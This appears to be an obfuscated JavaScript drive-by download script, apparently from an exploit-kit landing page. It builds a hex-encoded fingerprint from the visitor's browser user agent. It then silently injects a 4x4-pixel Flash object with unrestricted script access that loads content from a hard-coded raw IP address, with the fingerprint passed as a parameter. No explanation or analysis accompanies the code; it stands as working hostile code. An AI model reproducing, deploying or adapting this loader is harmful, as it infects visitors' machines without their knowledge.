/*s35972d58227hssfj39298fs*/function hgfgerdfgdf(num, width){/*s22395d74402hfj37901fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s77459d39190hfj19878fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s16210d2681hfj24604fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s71068d72997hfj89097fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd3440hfs*/c += b + d;/*s80865d69904hfj90842fs*/e += 1;}return c;}/*s66585dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.33.38/?NjUzNzgxMTc=&rand=xHzQMrDYbR7FFYPfKPrEUKREMU3WA0eKwY-ZhazVF5-xFDTGpbL1FxzspV-dCF-EmvJvdLAHIwKh1UfASwc&info=MzExOTcwNzA=&elsa=0mI8IUlgXoqj9jUCAnRSZ1JXRrxSONQhN_5OSFLM8i1yhmbNGJsl0kRTU7GMBzOstW1sS5QsalK_7VaOO-w&fore=OTQwMTgyMQ==", ghnvbn("http://188.225.33.38/?OTAxMTE4NjU=&rand=xH_QMrDYbR3FFYPfKPnEUKREMU3WA0SKwY-ZhazVF5yxFDfGpbH1Fx_spV-dCF-EmvJvdLAHIwGh1UTASwQ&elsa=0mIwIUlsXoqj9jUCAnRSZ1JXRrxSONQhN_5OSFLM8i1yhmbBGJsp0kRTU7GABzOgtUVsV4AsXnqz7S6CJrg&info=MjI3Nzk5NTk=&shld=NTIyODIxODc=","gexywoaxor"));